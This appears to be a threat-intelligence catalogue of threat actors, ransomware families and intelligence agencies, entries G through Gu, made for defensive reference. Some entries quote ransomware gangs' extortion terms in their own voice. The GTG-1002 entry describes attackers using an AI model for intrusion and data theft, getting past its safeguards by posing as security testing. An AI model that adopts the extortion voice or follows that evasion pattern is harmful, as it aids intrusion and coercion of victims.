Re-attacks are not allowed for target companies that have already made payments.
We do not allow non-profit hospitals and some non-profit organizations be targeted.
Gelsemium
The Gelsemium group has been active since at least 2014 and was described in the past by a few security companies. Gelsemium’s name comes from one possible translation ESET found while reading a report from VenusTech who dubbed the group 狼毒草 for the first time. It’s the name of a genus of flowering plants belonging to the family Gelsemiaceae, Gelsemium elegans is the species that contains toxic compounds like Gelsemine, Gelsenicine and Gelsevirine, which ESET choses as names for the three components of this malware family.
Geminis3
ransomware
Gendarmerie Intelligence Directorate (page does not exist)
Gendarmerie Intelligence Directorate (law enforcement)
Gendarmerie
ransomware
General Commissariat of Information
General Commissariat of Information - (Comisaría General de la Información) (CGI)
General Commissariat of Judiciary Police
General Commissariat of Judiciary Police - (Comisaría General de Policía Judicial) (CGPJ)
General Department of Military Intelligence
General Department of Defence Intelligence (GDDI)/General Department II - Tổng cục Tình báo Quốc phòng (TBQP)/Tổng cục II (TC2)
General Directorate for Internal Security
General Directorate for Internal Security (DGSI; Direction générale de la sécurité intérieure) – Domestic counter-terrorism and counter-espionage intelligence.
General Directorate for Territorial Surveillance (Morocco)
General Directorate for Territorial Surveillance - Direction de la Surveillance du Territoire (DST)
General Directorate of Analysis and Strategic Intelligence (Panama) (page does not exist)
General Directorate of Analysis and Strategic Intelligence - Direccion General de Analisis e Inteligencia Estrategica (DGAIE)[23]
General Directorate of General Security
General Directorate of General Security
General Directorate of Intelligence
General Directorate of Intelligence (GDI) – د استخباراتو لوی ریاست
General Intelligence Agency of Mongolia
General Intelligence Agency of Mongolia (GIA)
General Intelligence and Security Service
General Intelligence and Security Service - Algemene Inlichtingen en Veiligheidsdienst (AIVD)
General Intelligence Directorate (Syria)
General Intelligence Directorate
General Intelligence Service (Sudan)
General Intelligence Service
General Security Directorate (Iraq)
General Security Directorate - (GSD) - (Internal security agency)
General Staff Intelligence Directorate (page does not exist)
General Staff Intelligence Directorate (military intelligence)
General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]
General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]
genesis
Financial interests only.
We do not provide or work with affiliate programs, no collaborations either.
The requested payment must be made within a specified time frame, otherwise the price may be increased, we will begin to publish the data we have about your company and notify the company's customers and suppliers.
Charitable, non-profit, and medical institutions are only hacked if they have reputation gaps known from open sources or discovered in company data. However, this is only data extraction; live support systems are not affected.
Data is always destroyed after payment; we do not attack the same company twice.
Interesting fact: once, the total amount of claims against a breached company exceeded its entire capitalization. We know how to create trouble, though it is in our mutual interest to avoid it.
To make the data leak more valuable, the most important information is published in a separate folder for each company called “parsed” and is also published on darkweb forums.
Geneve
ransomware
Genobot
ransomware
Georgian Intelligence Service
Georgian Intelligence Service (GIS) − საქართველოს დაზვერვის სამსახური
GermanWiper
ransomware
GetCrypt
A new ransomware is in the dark market which encrypts all the files on the device and redirects victims to the RIG exploit kit.
GG Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Hewlett-Packard 2016
Ghost Jackal
AnonGhost is an apparent hacktivist collective. In October 2023, following a series of air- and land-based attacks in the Gaza Strip, AnonGhost was one of several hacktivist groups that claimed responsibility for disruptive attacks against computer networks in Israel. Researchers indicated that they observed AnonGhost actors exploit an undisclosed API vulnerability in Red Alert, an application that provides warning of projectile attacks in Israel, using Python scripts to intercept web requests and send spam messages to the app's users.[[Group-IB Threat Intelligence Tweet October 9 2023](/references/2df546ed-6577-44b2-9b26-0a17c3622df7)]
Ghost Ransomware Actors
Ghost actors, located in China, conduct widespread ransomware attacks for financial gain. They target networks with vulnerabilities, affecting organizations across more than 70 countries, including critical infrastructure, schools, healthcare, and more.[[U.S. CISA Ghost Cring Ransomware February 19 2025](/references/d3b3cebd-3428-4d71-a81e-a7cb6248e3b7)]
ghost
aka Cring / Ghost (Cring)
Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.
Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
GhostCrypt
Ransomware Based on Hidden Tear
GhostEmperor
GhostEmperor is a Chinese-speaking threat actor that targets government entities and telecom companies in Southeast Asia. They employ a Windows kernel-mode rootkit called Demodex to gain remote control over their targeted servers. The actor demonstrates a high level of sophistication and uses various anti-forensic and anti-analysis techniques to evade detection. They have been active for a significant period of time and continue to pose a threat to their targets.
GhosTEncryptor
ransomware
GhostHammer
ransomware
GhostNet
Cyber espionage is an issue whose time has come. In this second report from the Information Warfare Monitor, we lay out the findings of a 10-month investigation of alleged Chinese cyber spying against Tibetan institutions. The investigation, consisting of fieldwork, technical scouting, and laboratory analysis, discovered a lot more. The investigation ultimately uncovered a network of over 1,295 infected hosts in 103 countries. Up to 30% of the infected hosts are considered high-value targets and include computers located at ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The Tibetan computer systems we manually investigated, and from which our investigations began, were conclusively compromised by multiple infections that gave attackers unprecedented access to potentially sensitive information. Attacks on the Dalai Lama’s Private Office The OHHDL started to suspect it was under surveillance while setting up meetings be-tween His Holiness and foreign dignitaries. They sent an email invitation on behalf of His Holiness to a foreign diplomat, but before they could follow it up with a courtesy telephone call, the diplomat’s office was contacted by the Chinese government and warned not to go ahead with the meeting. The Tibetans wondered whether a computer compromise might be the explanation; they called ONI Asia who called us. (Until May 2008, the first author was employed on a studentship funded by the OpenNet Initiative and the second author was a principal investigator for ONI.)
GhostR
Ghostr is a financially motivated threat actor known for stealing a confidential database containing 5.3 million records from the World-Check and leaking about 186GB of data from a stock trading platform. They have been active on Breachforums.is, revealing massive data breaches involving comprehensive details of Thai users, including full names, phone numbers, email addresses, and ID card numbers.
GhostRedirector
GhostRedirector is a China-aligned threat actor that has compromised at least 65 Windows servers across various sectors, primarily in Brazil, Thailand, and Vietnam. It employs a passive C++ backdoor named Rungan and a malicious IIS module called Gamshen to maintain persistent access and manipulate search engine results for SEO fraud. The actor utilizes public exploits like EfsPotato and BadPotato for privilege escalation and abuses code-signing certificates to evade detection. GhostRedirector's operations involve installing remote access tools, creating rogue administrator accounts, and leveraging SQL injection vulnerabilities to execute PowerShell for downloading malicious payloads.
GhostSec
GhostSec is a hacktivist group that emerged as an offshoot of Anonymous. They primarily focused on counterterrorism efforts and monitoring online activities associated with terrorism. They gained prominence following the 2015 Charlie Hebdo shooting in Paris and the rise of ISIS.
Ghostwriter
Ghostwriter is referred as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.
GIBBERISH PANDA
GIBBERISH PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Gibberish
ransomware
Gibon
ransomware
Gingerbread
Ransomware
Gitloker
Gitloker is a threat actor group targeting GitHub repositories, wiping their contents, and extorting victims for their data. They use stolen credentials to compromise accounts, claim to have created a backup, and instruct victims to contact them on Telegram. The attackers leave a ransom note in the form of a README file, urging victims to negotiate the return of their data. GitHub is working to combat these evolving attacks and the vulnerabilities they exploit.
Giyotin
ransomware
Gladius
ransomware
Global Affairs Canada
Global Affairs Canada (GAC) Bureau of Intelligence Analysis and Security and Bureau of Economic Intelligence
global
Not a RaaS yet.
Globe v1
Ransomware
globe
Globe is a ransomware family that first appeared in August 2016, notable for its highly customizable codebase that allows operators to configure ransom note text, encryption algorithms, and file extensions. Globe uses symmetric encryption (RC4 or AES) to lock files and typically appends custom extensions such as .GLOBE, .PURPLE, .HNY, or others set by the attacker. The malware is distributed through malicious spam emails with infected attachments, compromised websites, and exploit kits. Globe’s flexibility made it attractive to low-skilled actors, resulting in many different variants in the wild. The family has primarily targeted small to medium-sized businesses and individual users across multiple regions, with no clear geographic focus.
Globe2 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Globe3 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 3 bitcoins. Extesion depends on the config file. It seems Globe is a ransomware kit.
GlobeImposter
During December 2017, a new variant of the GlobeImposter Ransomware was detected for the first time and reported on malware-traffic-analysis. At first sight this ransomware looks very similar to other ransomware samples and uses common techniques such as process hollowing. However, deeper inspection showed that like LockPoS, which was analyzed by CyberBit, GlobeImposter too bypasses user-mode hooks by directly invoking system calls. Given this evasion technique is being leveraged by new malware samples may indicate that this is a beginning of a trend aiming to bypass user-mode security products.
GNL Locker
Ransomware Only encrypts DE or NL country. Variants, from old to latest: Zyklon Locker, WildFire locker, Hades Locker
Gnosticplayers
The hacker said that he put up the data for sale mainly because these companies had failed to protect passwords with strong encryption algorithms like bcrypt. Most of the hashed passwords the hacker put up for sale today can cracked with various levels of difficulty --but they can be cracked. "I got upset because I feel no one is learning," the hacker told ZDNet in an online chat earlier today. "I just felt upset at this particular moment, because seeing this lack of security in 2019 is making me angry." In a conversation with ZDNet last month, the hacker told us he wanted to hack and put up for sale more than one billion records and then retire and disappear with the money. But in a conversation today, the hacker says this is not his target anymore, as he learned that other hackers have already achieved the same goal before him. Gnosticplayers also revealed that not all the data he obtained from hacked companies had been put up for sale. Some companies gave into extortion demands and paid fees so breaches would remain private. "I came to an agreement with some companies, but the concerned startups won't see their data for sale," he said. "I did it that's why I can't publish the rest of my databases or even name them."
GOBLIN PANDA
Goblin Panda is one of a handful of elite Chinese advanced persistent threat (APT) groups. Most Chinese APTs target the United States and NATO, but Goblin Panda focuses primarily on Southeast Asia.
GoCryptoLocker
ransomware
God Crypt Joke Ransomware
MalwareHunterTeam found a new ransomware called God Crypt that does not appear to decrypt and appears to be a joke ransomware. Has an unlock code of 29b579fb811f05c3c334a2bd2646a27a.
Godra
ransomware
GOFFEE
GOFFEE is a threat actor that has targeted entities in the Russian Federation since early 2022, employing spear phishing emails with malicious attachments, including modified Owowa and patched explorer.exe. They have utilized PowerTaskel, a non-public Mythic agent in PowerShell, and introduced a new implant called "PowerModul" for attacks against sectors such as media, telecommunications, and government. GOFFEE has increasingly shifted to a binary Mythic agent for lateral movement and has incorporated Word documents with malicious VBA scripts in their infection chains. The group has demonstrated a consistent evolution in their TTPs while maintaining identifiable characteristics that attribute their campaigns with high confidence.
GOG Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
GoGoogle
ransomware
GoHack
ransomware
GOLD BURLAP
GOLD BURLAP is a group of financially motivated criminals responsible for the development of the Pysa ransomware, also referred to as Mespinoza. Pysa is a cross-platform ransomware with known versions written in C++ and Python. As of December 2020, approximately 50 organizations had reportedly been targeted in Pysa ransomware attacks. The operators leverage 'name and shame' tactics to apply additional pressure to victims. As of January 2021, CTU researchers had found no Pysa advertisements on underground forums, which likely indicates that it is not operated as ransomware as a service (RaaS).
GOLD CABIN
GOLD CABIN is a financially motivated cybercriminal threat group operating a malware distribution service on behalf of numerous customers since 2018. GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.
GOLD DUPONT
GOLD DUPONT is a financially motivated cybercriminal threat group that specializes in post-intrusion ransomware attacks using 777 (aka Defray777 or RansomExx) malware. Active since November 2018, GOLD DUPONT establishes initial access into victim networks using stolen credentials to remote access services like virtual desktop infrastructure (VDI) or virtual private networks (VPN). From October 2019 to early 2020 the group used GOLD BLACKBURN's TrickBot malware as an initial access vector (IAV) during some intrusions. Since July 2020, the group has also used GOLD SWATHMORE's IcedID (Bokbot) malware as an IAV in some intrusions.
GOLD EVERGREEN
GOLD EVERGREEN was a financially motivated cybercriminal threat group that operated the Gameover Zeus (aka Mapp, P2P Zeus) botnet until June 2014. It encompasses an expansive and long running criminal conspiracy operated by a confederation of individuals calling themselves The Business Club from the mid 2000s until 2014. GOLD EVERGREEN's technical operation was facilitated primarily through botnets using the Zeus, JabberZeus, and eventually Gameover Zeus malware families. These malware families were designed and maintained by a Russian national Evgeniy Bogachev (aka 'slavik') who was indicted by the U.S. DOJ in 2014 and remains a fugitive.
GOLD FAIRFAX
GOLD FAIRFAX is a financially motivated cybercriminal threat group responsible for the creation, distribution, and operation of the Ramnit botnet. Ramnit, the phonetic spelling of RMNet, the internal name of the core module, began operation in April 2010 and became widespread in July 2010. A particularly virulent file-infecting component of early Ramnit variants that spreads by modifying executables and HTML files has resulted in the continued prevalence of those early variants. Currently, Ramnit remains an actively maintained and distributed threat. The intent of Ramnit is to intercept and manipulate online financial transactions through modification of web browser behavior ('man-in-the-browser').
GOLD FLANDERS
GOLD FLANDERS is a financially motivated group responsible for distributed denial of service (DDOS) attacks linked to extortion emails demanding between 5 and 30 bitcoins. The attacks consist mostly of fragmented UDP packets (DNS and NTP reflection) as well as other traffic that can vary per victim. The arrival of the extortion email is timed to coincide with a DDOS attack consisting of traffic between 20 Gbps and 200 Gbps and 12-15 million packets per second, lasting between 20 and 70 minutes targeted at a particular Autonomous System Number (ASN) or group of IP addresses. In some cases victim organisations have replied to these extortion emails and received personal replies from GOLD FLANDERS operators within 20 minutes.
GOLD GALLEON
GOLD GALLEON is a financially motivated cybercriminal threat group comprised of at least 20 criminal associates that collectively carry out business email compromise (BEC) and spoofing (BES) campaigns. The group appears to specifically target maritime organizations and their customers. CTU researchers have observed GOLD GALLEON targeting firms in South Korea, Japan, Singapore, Philippines, Norway, U.S., Egypt, Saudi Arabia, and Colombia. The threat actors leverage tools, tactics, and procedures that are similar to those used by other BEC/BES groups CTU researchers have previously investigated, such as GOLD SKYLINE. The groups have used the same caliber of publicly available malware (inexpensive and commodity remote access trojans), crypters, and email lures.
GOLD GARDEN
GOLD GARDEN was a financially motivated cybercriminal threat group that authored and operated the GandCrab ransomware from January 2018 through May 2019. GandCrab was operated as a ransomware-as-a-service operation whereby numerous affiliates distributed the malware and split ransom payments with the core operators. GOLD GARDEN maintained exclusive control of the development of GandCrab and associated command and control (C2) infrastructure. Individual affiliates, of which there were frequently more than a dozen in operation simultaneously, coordinated the distribution of GandCrab through spam emails, web exploit kits, pay-per-install botnets, and scan-and-exploit style attacks. On May 31, 2019 the operators announced they have halted operations with no intent to resume for unknown reasons. In April 2019 the operators of GOLD GARDEN transferred the source code of GandCrab to GOLD SOUTHFIELD who used it as the foundation of the REvil ransomware operation. GOLD SOUTHFIELD operates a similar affiliate program comprised largely of former GandCrab users and other groups recruited from underground forums.
GOLD MANSARD
GOLD MANSARD is a financially motivated cybercriminal threat group that operated the Nemty ransomware from August 2019. The threat actor behind Nemty is known on Russian underground forums as 'jsworm'. Nemty was operated as a ransomware as a service (RaaS) affiliate program and featured a 'name and shame' website where exfiltrated victim data was leaked. In April 2020, jsworm appeared to acquire new partners and retired the Nemty ransomware. This was followed by the introduction of Nefilim ransomware, which does not operate as an affiliate model. Nefilim has been used in post-intrusion ransomware attacks against organizations in logistics, telecommunications, energy and other sectors.
GOLD NORTHFIELD
Operational since at least October 2020, GOLD NORTHFIELD is a financially motivated cybercriminal threat group that leverages GOLD SOUTHFIELD's REvil ransomware in their attacks. To do this, the threat actors replace the configuration of the REvil ransomware binary with their own in an effort to repurpose the ransomware for their operations. GOLD NORTHFIELD has given this modified REvil ransomware variant the name 'LV ransomware'.
GOLD PRELUDE
GOLD PRELUDE is a financially motivated cybercriminal threat group that operates the SocGholish (aka FAKEUPDATES) malware distribution network. GOLD PRELUDE operates a large global network of compromised websites, frequently running vulnerable content management systems (CMS), that redirect into a malicious traffic distribution system (TDS). The TDS, which researchers at Avast have named Parrot TDS, uses opaque criteria to select victims to serve a fake browser update page. These pages, which are customized to the specific visiting browser software, download the JavaScript-based SocGholish payload frequently embedded within a compressed archive.
GOLD REBELLION
GOLD REBELLION is a financially motivated cybercriminal threat group that operates the Black Basta name-and-shame ransomware. The group posted its first victim to its leak site in April 2022 and has continued to publish victim names at a rate of around 15 a month since then. GOLD REBELLION has not openly advertised or appeared to recruit for an affiliate program but the variety of tactics, techniques and procedures (TTP) observed in Black Basta intrusions suggests that multiple individuals are engaged in the ransomware scheme.Several security vendors and independent researchers have suggested the distributors of Black Basta may be former affiliates of GOLD ULRICK's Conti operation. Technical artifacts analyzed by CTU researchers suggest that Black Basta has been under development since at least early February 2022, several weeks before extensive public leaks detailed GOLD ULRICK's Conti operation. In November 2022, researchers at SentinelOne linked custom tooling used by GOLD REBELLION to the GOLD NIAGARA (FIN7) threat group. CTU researchers have not made independent observations corroborating a relationship between these threat groups or any others.GOLD REBELLION appear to have been a key customer of GOLD LAGOON's Qakbot: CTU researchers observed multiple incidents where Black Basta was distributed through it as an initial access vector (IAV), leading to Cobalt Strike and further lateral movement into the victim network. Following the takedown of Qakbot in August 2023, GOLD REBELLION explored new methods of delivery, including DarkGate and Pikabot. In one incident, CTU researchers observed a threat actor gain access to a victim network through a managed security services provider (MSSP). In October 2024, GOLD REBELLION likely exploited a vulnerability in a Sonic Wall VPN device for access. Also in 2024, CTU researchers observed multiple instances of the group using social engineering to convince victims to download remote management and monitoring tools like AnyDesk and Quick Assist. After spamming inboxes with multiple emails, the threat actors approached the affected users via Teams, purporting to be IT Support or Help Desk employees offering assistance with email inbox issues.Other tools members of the group have used include the SystemBC back connect malware, PsExec for remote execution, RDP for lateral movement, batch files to delete their own tools and disable anti-virus programs for defense evasion, and both Rclone and MegaSync for data exfiltration.
GOLD RIVERVIEW
GOLD RIVERVIEW was a financially motivated cybercriminal group that facilitated the distribution of malware- and scam-laden spam email on behalf of its customers. This threat group authored and sold the Necurs rootkit beginning in early 2014, including to GOLD EVERGREEN who integrated it into Gameover Zeus. GOLD RIVERVIEW also operated a global botnet that was colloquially known as Necurs (CraP2P) and was a major source of spam email from 2016 through 2018. Necurs distributed malware such as GOLD DRAKE's Dridex (Bugat v5), GOLD BLACKBURN's TrickBot, and other families like Locky and FlawedAmmy. Necurs also distributed a large volume of email pushing securities 'pump and dump' scams, rogue pharmacies, and fraudulent dating sites. On March 4, 2019 all three active segments of the Necurs botnet ceased operation and have not since resumed. On March 10, 2020 Microsoft took civil action against GOLD RIVERVIEW and made technical steps that would complicate the threat actors' ability to reconstitute the botnet.
GOLD SKYLINE
GOLD SKYLINE is a financially motivated cybercriminal threat group operating from Nigeria engaged in high-value wire fraud facilitated by business email compromise (BEC) and spoofing (BES). Also known as Wire-Wire Group 1 (WWG1), GOLD SKYLINE has been active since at least 2016 and relies heavily on compromised email accounts, social engineering, and increasingly malware to divert inter-organization funds transfers.
GOLD SYMPHONY
GOLD SYMPHONY is a financially motivated cybercrime group, likely based in Russia, that is responsible for the development and sale on underground forums of the Buer Loader malware. First discovered around August 2019, Buer Loader is offered as a malware-as-a-service (MasS) and has been advertised by a threat actor using the handle 'memeos'. Customers include GOLD BLACKBURN, the operators of the TrickBot malware. In addition to TrickBot, Buer Loader has been reported to download Cobalt Strike and other tools for use in post-intrusion ransomware attacks.
GOLD WATERFALL
GOLD WATERFALL is a group of financially motivated cybercriminals responsible for the creation, distribution, and operation of the Darkside ransomware. Active since August 2020, GOLD WATERFALL uses a variety of tactics, techniques, and procedures (TTPs) to infiltrate and move laterally within targeted organizations to deploy Darkside ransomware to its most valuable resources. Among these TTPs are using malicious documents delivered by email to establish a foothold and using stolen credentials to access victims' remote access services. In November 2020, the 'darksupp' persona was observed advertising an affiliate program on several semi-exclusive underground forums, marking GOLD WATERFALL's entry into the ransomware-as-a-service (RaaS) landscape.
GOLD WINTER
GOLD WINTER are a financially motivated group, likely based in Russia, who operate the Hades ransomware. Hades activity was first identified in December 2020 and its lack of presence on underground forums and marketplaces leads CTU researchers to conclude that it is not operated under a ransomware as a service affiliate model. GOLD WINTER do employ name-and-shame tactics, where data is stolen and used as additional leverage over victims, but rather than a single centralized leak site CTU researchers have observed the group using Tor sites customized for each victim that include a Tox chat ID for communication, which also appears to be unique for each victim.
Golden Axe
ransomware
GoldenEye Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…
GoldenJackal
GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. Kaspersky believes the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server. They developed a collection of .NET malware tools known as Jackal.
GoldFactory
GoldFactory is a threat actor group attributed to developing sophisticated mobile banking malware targeting victims primarily in the Asia-Pacific region, specifically Vietnam and Thailand. They utilize social engineering to deliver malware to victims' devices and have close connections to the Gigabud malware family. GoldFactory's Trojans, such as GoldPickaxe and GoldDigger, employ tactics like smishing, phishing, and fake login screens to compromise victims' phones and steal sensitive information. Their evolving malware suite demonstrates a high level of operational maturity and ingenuity, requiring a proactive and multi-faceted cybersecurity approach to detect and mitigate their threats.
Gomasom
Ransomware
Gomme
ransomware
GonnaCry Ransmware
ransomware
good day
Good Day is a ransomware variant within the ARCrypter family, first observed in May 2023. It gained prominence due to its reticent financial extortion model and custom branding—victims are greeted with a “Good day” message upon landing on individualized Tor-based victim portals. The malware is typically delivered via phishing campaigns disguising payloads as legitimate Windows updates. It utilizes a robust encryption workflow, including deletion of volume shadow copies and process evasion mechanisms. Notably, Good Day has been linked to the Cloak ransomware group through shared data leak infrastructure and overlapping leak portal behaviors.
Goofed HT
ransomware
Goopic
Ransomware
Gopher
Ransomware OS X ransomware (PoC)
GopherWhisper
GopherWhisper is a China-aligned APT that routes C2 traffic through legitimate enterprise platforms like Slack, Discord, and Microsoft 365 Outlook to evade detection. Its toolkit includes the LaxGopher backdoor for Slack, RatGopher for Discord, and CompactGopher for data exfiltration via file.io. The group employs DLL side-loading via JabGopher and uses raw OpenSSL socket C2 on port 443 with the SSLORDoor backdoor. GopherWhisper has targeted Mongolian government entities and is assessed to have additional unidentified victims in Central Asia.
GoRansom POC
ransomware
Gorgon
ransomware
Gorilla
Gorilla is a threat-actor operating a DoS-as-a-service service controlled on Telegram.
Gotcha
ransomware
GottaCry
ransomware
Government Communications Headquarters
Government Communications Headquarters (GCHQ)[39] – Signals intelligence gathering and analysis.
Government Communications Security Bureau
Government Communications Security Bureau[20]
GozNym
IBM X-Force Research uncovered a Trojan hybrid spawned from the Nymaim and Gozi ISFB malware. It appears that the operators of Nymaim have recompiled its source code with part of the Gozi ISFB source code, creating a combination that is being actively used in attacks against more than 24 U.S. and Canadian banks, stealing millions of dollars so far. X-Force named this new hybrid GozNym. The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers. The end result is a new banking Trojan in the wild.
GPAA
ransomware
GPGQwerty
ransomware
Gray Sandstorm
Gray Sandstorm is an Iran-linked threat actor that has been active since at least 2012. They have targeted defense technology companies, maritime transportation companies, and Persian Gulf ports of entry. Their primary method of attack is password spraying, and they have been observed using tools like o365spray. They have a specific focus on US and Israeli targets and are likely operating in support of Iranian interests.
GrayBravo
TAG-150, also known as GrayBravo, is a sophisticated threat actor responsible for developing multiple custom malware families, including CastleLoader and CastleRAT, and operates a large-scale, multi-layered infrastructure. The group employs the ClickFix technique to distribute malware through phishing attacks that impersonate legitimate services, leveraging deceptive domains and fake repositories. Insikt Group has identified four distinct activity clusters associated with TAG-150, each targeting different victim profiles and utilizing unique TTPs.
GrayCharlie
GrayCharlie is a threat actor that compromises WordPress sites to inject malicious JavaScript, redirecting visitors to NetSupport RAT payloads via fake browser update pages or ClickFix mechanisms. Insikt Group has identified extensive infrastructure linked to GrayCharlie, primarily associated with MivoCloud and HZ Hosting Ltd., including command-and-control servers and staging infrastructure. The group employs two primary attack chains to deliver the NetSupport RAT, utilizing both fake updates and ClickFix techniques. GrayCharlie targets organizations worldwide, with a particular focus on the US, and has shown persistent behavior in its operations since its emergence in 2023.
Grayling
Grayling activity was first observed in early 2023, when a number of victims were identified with distinctive malicious DLL side-loading activity. Grayling appears to target organisations in Asia, however one unknown organisation in the United States was also targeted. Industries targeted include Biomedical, Government and Information Technology. Grayling use a variety of tools during their attacks, including well known tools such as Cobalt Strike and Havoc and also some others.
GreedyBear
GreedyBear is a sophisticated threat actor responsible for over $1 million in cryptocurrency theft through a campaign involving 150 malicious Firefox extensions, nearly 500 malicious executables, and numerous fraudulent websites. They employ techniques such as 'Extension Hollowing' to replace legitimate extensions with malicious versions that capture wallet credentials. The campaign is centralized, with most malicious domains resolving to a single IP address, and it has expanded to target other browsers while utilizing AI-generated code to enhance scalability and evade detection.
Greenbug
Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.
GreenMwizi
GreenMwizi is assessed to be an actor based in Nairobi, Kenya that has carried out scam campaigns involving social media bots. A campaign observed in May 2023 appeared to target customers of a major online travel/hospitality booking brand.[[GreenMwizi - Kenyan scamming campaign using Twitter bots](/references/3b09696a-1345-4283-a59b-e9a13124ef59)]
GreenSpot
GreenSpot is an APT group believed to operate from Taiwan, active since at least 2007, primarily targeting government, academic, and military entities in China through phishing campaigns. The group frequently targets 163.com, aiming to steal login credentials using deceptive domains, manipulated TLS certificates, and counterfeit interfaces. Their tactics highlight the sophistication of modern credential theft operations, necessitating detection efforts focused on irregular domain registrations and certificate anomalies.
GREF
GREF is a China-aligned APT group that has been active since at least March 2017. They are known for using custom backdoors, loaders, and ancillary tools in their targeted attacks. Recently, they have been attributed to two active Android campaigns that distribute the BadBazaar malware through malicious apps on official and alternative app stores. GREF has targeted Android users, particularly Uyghurs and other Turkic ethnic minorities outside of China, using trojanized versions of popular messaging apps like Signal and Telegram.
Gremit Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Grep
Grep is an active extortion or ransomware group tracked by RansomLook.
GreyEnergy
ESET research reveals a successor to the infamous BlackEnergy APT group targeting critical infrastructure, quite possibly in preparation for damaging attacks
Greystars
ransomware
Grief
captcha prevents indexing
GRIM SPIDER
GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past. Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD. Grim Spider is reportedly associated with Lunar Spider and Wizard Spider.
Grinch
Grinch is an active extortion or ransomware group tracked by RansomLook.
GrodexCrypt
ransomware
Groove
Groove was a short-lived ransomware group and cybercrime gang that emerged in August 2021 and became notable for its aggressive, publicity-driven tactics. Unlike traditional Ransomware-as-a-Service (RaaS) groups, Groove functioned more as a loose criminal collective, encouraging other threat actors to join forces in attacking U.S. entities, particularly in the government and financial sectors. The group ran a Tor-based leak site where it published stolen data, but its operators claimed to focus more on building an “underground alliance” than on ransomware deployment itself. Analysts noted overlaps between Groove and actors behind Babuk and BlackMatter, as well as forum personas known for data theft operations. By early 2022, Groove’s activity had largely ceased, with some experts suggesting the group was either a short-term recruitment campaign or a misinformation effort.
Groundbait
Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk People’s Republics.
GRU (Russian Federation)
Main Intelligence Directorate (GRU) – Главное Разведывательное Управление
GrujaRSorium
ransomware
Gruxer
ransomware
GTFire
GTFire is a threat actor that leverages Google Firebase for hosting phishing pages and Google Translate to disguise malicious URLs, effectively bypassing security filters. The campaign employs a multi-step redirect chain to obscure the final phishing destination and utilizes All-in-1 PHP phishing scripts for rapid deployment and credential harvesting. Credentials are exfiltrated via URL parameters in a standard HTTP GET request, with minimal operational overhead.
GTG-1002
GTG-1002 is a Chinese state-sponsored APT that conducted a large-scale autonomous cyber espionage campaign targeting approximately 30 global organizations across various sectors, focusing on military and energy-related data. The operation utilized AI, specifically Anthropic’s Claude model, for reconnaissance, exploitation, and data exfiltration, significantly reducing human involvement. Attackers employed techniques such as automated task execution and evasion of safety protocols by masquerading as legal security testing. The campaign lasted 18 months and highlighted vulnerabilities in traditional incident response workflows.
Guacamaya
